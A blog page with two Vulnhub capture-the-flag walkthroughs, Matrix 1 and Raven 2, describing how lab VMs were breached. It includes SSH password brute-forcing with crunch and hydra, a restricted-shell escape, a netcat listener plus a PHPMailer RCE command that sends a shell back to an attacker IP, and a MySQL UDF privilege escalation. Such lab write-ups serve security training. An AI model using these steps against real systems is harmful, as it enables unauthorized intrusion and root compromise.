Monday, November 26, 2018

Matrix 1: Vulnhub CTF Walkthrough

https://www.vulnhub.com/entry/matrix-1,259/

1.   We do the usual scan for the IP address.  Then, we do the service scan.

2.   I went to do a nikto scan while I was using burp suite to investigate the page presented on port 80.
3. Also, I went to dirb to get a directory scan to find anything weird in the folder structure.  I found the assets folder and it only had a few folders in it.

4.  Inside of the IMG folder, there was an image that pointed me in the direction to use another port.  “FOLLOW the WHITE RABBIT”.
5.  We see the different web page.  Let’s check out the page source.  Looks like there is hash to decode.  



6.  Once we decode the hash, we have a Matrix quote.  I remember seeing that in the theater. Anyway, it looks like it is telling us there may be a file of some kind created from the “>” symbol.


7.  There is a file called Cypher.matrix there.  Now, once you download it, and try to read it, you find more encoded information.  Now the only reason I knew where to go is that I have seen it before on previous CTFs.
8.  I went to https://copy.sh/brainfuck/ and decoded it.




9.  Well we have the message:
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

10.  Ok. So we have a clue to the password for guest.  We just need to hit the correct combination of the last two characters.  Enter crunch and hydra. You can use the man pages for the commands but the short of it is, you can give it characters to start with and it will keep add combinations of characters that you give it.  It will output to a file. With that file, you can use hydra to test ssh for a successful login.
11.  We have a successful login but it looks like it is to a restricted shell.  We do not have access to a lot of the usual commands.
12.  Looked up if there was a way around it.  Have to love Google.
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
13.  We are out of the restricted shells.  Let’s run some commands. We should look at version, folder structure, files, etc.  

14.  We have found a few things.  There is a weird python executable.  Also, I checked the “guest” bash history.  It seems like the account was creating ssh keys to login?





15.  I didn’t get anywhere trying to figure out what they were doing for SSH.  I moved on to linux priv checker script to gather more info. It reminded me to check out “sudo –l”.  See if there is any commands that guest can run.

16.  Looks like guest can run any command as root.  Let’s give it a try. That worked and there’s the flag.


Sunday, November 25, 2018

Raven 2: Vulnhub CTF Walkthrough

https://www.vulnhub.com/entry/raven-2,269/

1. We do the usual scan for the IP address.  Then, we do a service scan.  
screenshot34
screenshot35


screenshot31

screenshot33
2.  It looks the same as Raven 1.  Just like any other repeated penetration test, we start looking at the previous things.  We do a scan of the wordpress installation using wpscan, again. 
screenshot32


screenshot29
screenshot30
3. AHhhh. We have the same logins as before. Maybe the same passwords work. Nope. Dead End.
I could not login with the old RAVEN 1 passwords.


screenshot27


screenshot28


flag1
4.  From the files, it looks like there is phpmailer installation that has a vulnerable version.  A google  and exploit-db search find a possible exploit for the vulnerability.

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
5. After reading the exploit, I check to find all the required settings/pages for it to work.  We have the contact page.  We have the parameters from the web page in order to run the exploit code.


screenshot25


screenshot26
6. Look at the script. You may have to update a default parameter in order for it to work. parser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST "action" field name', default="send") parser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST "name of sender" field name', default="name") parser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST "email" field name', default="email") parser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST "message" field name', default="msg")


C:\Users\jmoney\AppData\Local\Microsoft\Windows\INetCache\Content.Word\screenshot21.png
screenshot22
7. So now, I run the code in order to create the webshell. I just use netcat to open a connection on port 80.
sudo nc -lvvp 80
python raven2.py -url http://raven.local/ -d vendor -cf contact.php -ip 192.168.126.1 -p 80 --post-msg message
screenshot19


screenshot20

8. Now, I have a shell. I just continue to look around and note all the changes to the box from Raven 1.
screenshot24
screenshot18


screenshot16
screenshot17


flag2
9.  While looking around, I view some flags and take screenshots. 
flag3a


flag3b

10. Also, I used the LinEnum.sh and linux priv checker scripts to find out more information about the box. I took note of /var/mail.
It has michael and www-data which I thought was weird. I didn't see anything there. Probably missed something.
screenshot11
screenshot12


screenshot13
11. Need an interactive shell. I first found out how to upgrade a shell by following ippsec. Check out his youtube. Googled exactly how. https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell stty raw -echo
screenshot10

12. Now that we have the interactive shell, I can log into mysql. I can check the tables, databases and users.
screenshot9
screenshot8
screenshot7

screenshot14
screenshot15
13.  Password didn’t work for Michael or steven.  Well we have access to mysql.  It is running as root from LinEnum and linux priv checker.  We should be able to use that.

https://payatu.com/guide-linux-privilege-escalation/
https://www.exploit-db.com/exploits/1518/
https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/

-- Side Note.  If you cannot compile the exploit on the box, just use another VM and compile it there.  Use a wget if it is there to transfer the compiled file on the vulnerable box.

screenshot6
screenshot5


screenshot4
14.  Now, this is where I f'd up.  I was able to setup a do_system function but I ran the wrong command which broke the shell.  Time to start that back up.  This time I will run the right command using netcat to send a shell back to my box as root.  There is flag4 and game over.


screenshot3
screenshot2